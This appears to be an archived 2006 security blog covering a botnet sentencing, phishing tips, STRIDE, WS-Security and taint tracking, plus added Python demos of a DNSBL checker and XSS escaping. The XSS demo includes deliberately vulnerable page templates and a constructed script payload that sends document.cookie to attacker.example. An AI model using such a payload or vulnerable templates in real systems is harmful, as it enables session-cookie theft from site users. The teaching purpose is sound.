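    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def interpret(answer):
    """Classify the A record a list returns for the query."""
    if answer is None:
        return "not listed"
    octets = answer.split(".")
    if octets[0] != "127":
        return "unexpected answer %s (wildcarded or hijacked zone?)" % answer
    if octets[1:3] == ["255", "255"]:
        # Spamhaus signals query problems (open resolver, rate limit) in
        # 127.255.255.0/24; treat these as errors, never as a listing
        return "query error %s" % answer
    return "listed (code %s)" % answer


def check_listing(ip, zones=ZONES, resolve=_resolve):
    """Query every zone and return {list name: verdict}."""
    return {name: interpret(resolve(dnsbl_query_name(ip, zone)))
            for name, zone in zones.items()}


if __name__ == "__main__":
    # constructed answers standing in for real DNS replies
    fake_dns = {"4.3.2.1.sbl.spamhaus.org": "127.0.0.2"}
    print(check_listing("1.2.3.4", resolve=fake_dns.get))
```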


Friday, May 12, 2006

E-Crime and Hacking

US hacker gets five years in the slammer


A US man has been sentenced to nearly five years in prison after he was found guilty of illegally controlling around 400,000 third party PCs for the purposes of launching malware attacks.

Jeanson James Ancheta, 21, from California, rented out space on this zombie network of compromised machines for the sending of spam and malware, and also for launching denial of service attacks.

Among the machines infected by Ancheta were computers at the US military test base at China Lake in the Mojave Desert. Ancheta was ordered to pay the US Navy $15,000 in damages as well as surrendering $60,000 in proceeds from his crimes.

Ancheta advertised his zombie network - or botnet - on his own website called botz4sale.

Thursday, May 04, 2006

XSS Attacks

There are two ways for users to be hit by an XSS attack:

1. They may be tricked into clicking a specially crafted link (a non-persistent, or reflected, attack), or

2. they may unknowingly visit a web page in which malicious code has been stored (a persistent attack).

It is also important to note that the user’s web browser or computer does not have to be susceptible to any well-known vulnerability.

This means that no amount of patching on the client will help; users depend entirely on the website’s own security measures, above all encoding untrusted data before it is written into a page, for their safety.
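
The two injection points described above, each in its vulnerable and its encoded form, plus the attribute context that plain tag escaping does not cover, as an added example that is not part of the original post. The page templates, the in-memory comment store and the payload are constructed for the demo.

```python
import html
from urllib.parse import parse_qs, urlencode

# Added example, not from the original post. Templates and store are assumptions.
_comments = []  # stand-in for the database a persistent payload is stored in


def crafted_query(payload):
    """The query string an attacker puts in a specially crafted link."""
    return urlencode({"q": payload})


def search_page_vulnerable(query_string):
    """Non-persistent (reflected): the link's parameter is echoed as-is."""
    q = parse_qs(query_string).get("q", [""])[0]
    return "<p>Results for %s</p>" % q


def search_page_safe(query_string):
    """Same page with the untrusted value encoded for an HTML text context."""
    q = parse_qs(query_string).get("q", [""])[0]
    return "<p>Results for %s</p>" % html.escape(q, quote=True)


def post_comment(text):
    """The server stores what it received; encoding belongs at output time."""
    _comments.append(text)


def clear_comments():
    del _comments[:]


def comments_page_vulnerable():
    """Persistent: every later visitor receives the stored payload."""
    return "<ul>" + "".join("<li>%s</li>" % c for c in _comments) + "</ul>"


def comments_page_safe():
    return "<ul>" + "".join("<li>%s</li>" % html.escape(c, quote=True) for c in _comments) + "</ul>"


def attribute_page_safe(value):
    """Attribute context: quote the attribute AND escape quotes, otherwise a
    value such as  x" onmouseover="...  closes the attribute and adds a handler."""
    return '<input name="q" value="%s">' % html.escape(value, quote=True)


if __name__ == "__main__":
    # constructed payload; attacker.example is a reserved example domain
    payload = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
    print(search_page_vulnerable(crafted_query(payload)))
    print(search_page_safe(crafted_query(payload)))
```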

Monday, April 17, 2006

General tips to prevent phishing

  1. If your bank sends an email asking you to verify information (a new account, a withdrawal or anything similar), contact the bank by phone, using a number you already know, and verify that the mail is legitimate.
  2. The golden rule is 'don't click the link' to log in to the bank website. Type the bank's address into your browser by hand and go to the website.
  3. Most big companies address people by name; if you get a generic greeting like 'dear valued user', it could be a phishing mail.

The weakest link in the security chain? You

Human error was responsible for nearly 60 per cent of information security breaches last year, a new study has found.

According to the fourth annual CompTIA (Computing Technology Industry Association) study on information security and the workforce, released on Tuesday, this figure is significantly higher than the number in 2004, when 47 per cent of security breaches were blamed on human error alone.

Despite the prominent role that human behaviour plays in information security breaches, just 29 per cent of the 574 organisations worldwide that participated in the survey said security training is a must for employees. Only 36 per cent of organisations offer security awareness training, the study found.

"The primary cause of security breaches - human error - is not being adequately addressed," Brian McCarthy, chief operating officer of CompTIA, said in a statement. "The person behind the PC continues to be the primary area where weaknesses are exposed."

Friday, March 31, 2006

Buffer Overflow

See this

http://www.insecure.org/stf/smashstack.txt

...Njoy !

Introduction to Web Services Security

Although the basic web services standards serve a great many scenarios, they lack features that most real-world applications need, such as standard ways to handle security and authentication. These are being developed in various standardization initiatives, and some have recently become standards; one of them is WS-Security, an OASIS standard.

Previously, web service authentication was something you had to implement yourself in your application.

You also had to rely on transport-level security for confidentiality if your web service exchanged confidential data over the wire.

Early SOAP implementations mainly used HTTP as the transport protocol, so the assumption was that security could be based on HTTP as well, and web services were secured with SSL/TLS and HTTP Basic authentication.

Consequently SOAP itself contains no security elements; it leaves this to a combination of transport security and custom authentication implementations.

SOAP implementations increasingly use transports other than HTTP, so securing the messages themselves has become very important.

Also, SOAs are built from interconnected nodes and applications that often communicate through other systems, which makes point-to-point mechanisms such as SSL/TLS inadequate: transport security ends at each hop, so an intermediary sees, and can alter, the message in the clear.

Tuesday, March 21, 2006

The STRIDE Model

Many security evangelists use the STRIDE model for threat modeling an application.

Spoofing user identity - Spoofing threats are usually associated with a wily hacker being able to impersonate a valid system user or resource to get access to the system and thereby compromise system security.


Tampering with data - Tampering with data involves the malicious modification of system or user data with or without detection.


Repudiation - Repudiation threats are associated with users—malicious or otherwise—who can deny performing an action without administrators having any way to prove otherwise. An example of a repudiation threat is a user performing an illegal operation in a system that lacks the ability to trace such operations.


Information Disclosure - Information disclosure threats involve the compromising of private or business-critical information through the exposure of that information to individuals who are not supposed to see it.


Denial of service - Denial of service (DoS) threats when carried out deny service to valid users—for example, by making the system temporarily unavailable or unusable or by forcing a reboot or restart of the user’s machine.


Elevation of privilege - In this type of threat, an unprivileged user gains privileged access and thereby has sufficient access to compromise or destroy the entire system.

Thursday, March 09, 2006

What is a Comprehensive Assessment?

A comprehensive assessment is a systematic assessment performed on the application code.

Security Comprehensive Assessment – This is a line-by-line assessment of the application code to ensure there are no security vulnerabilities such as clear text passwords and SQL injection problems. NOTE: if we do not have access to the source code for a 3rd-party application black-box testing will be conducted.

Privacy Comprehensive Assessment – This is an assessment of the application code to ensure there are no privacy violations such as using the incorrect privacy statement or Legal Notice and not using data input validation rules (e.g., zip codes should only have numeric values).

Sunday, February 19, 2006

Cleared the CEH

Hi,

I have cleared the CEH (Certified Ethical Hacker) examination.

The CEH certification covers nearly every aspect of penetration testing and I would recommend starting with the CEH.

My certification is an asset to my company and the value of the knowledge I carry.
It indeed has made a valuable difference to me and my company.

Regards,
Dharmesh.

Monday, January 16, 2006

Google: Yes, You Can Find Just About Anything

Hackers and security experts use various custom and open source tools to complete their tasks.

In fact, one of the tools they use you probably use every time you browse the web: the Google search engine. I remember the first time I used the Google search engine years ago. I was amazed at how quickly it fulfilled my search request.

Google's huge index of systems and information and its ability to perform complex searches have evolved over the years. When we perform security assessments and penetration tests, we regularly use Google to locate information that organizations typically want to keep private and confidential.

Full: http://castlecops.com/article-6466-nested-0-0.html

Data protection watchdog investigation finds no evidence

UK banks escape punishment over India data breach

UK banks will not face any action over a data breach in an Indian call centre last year, where an undercover newspaper reporter was allegedly sold bank and credit card details of 1,000 customers.

Monday, January 02, 2006

Automatically Hardening Web Applications using Precise Tainting.

Most web applications contain security vulnerabilities. The simple and natural ways of creating a web application are prone to SQL injection attacks and cross-site scripting attacks as well as other less common vulnerabilities. In response, many tools have been developed for detecting or mitigating common web application vulnerabilities. Existing techniques either require effort from the site developer or are prone to false positives. This paper presents a fully automated approach to securely hardening web applications. It is based on precisely tracking taintedness of data and checking specifically for dangerous content only in parts of commands and output that came from untrustworthy sources. Unlike previous work in which everything that is derived from tainted input is tainted, our approach precisely tracks taintedness within data values.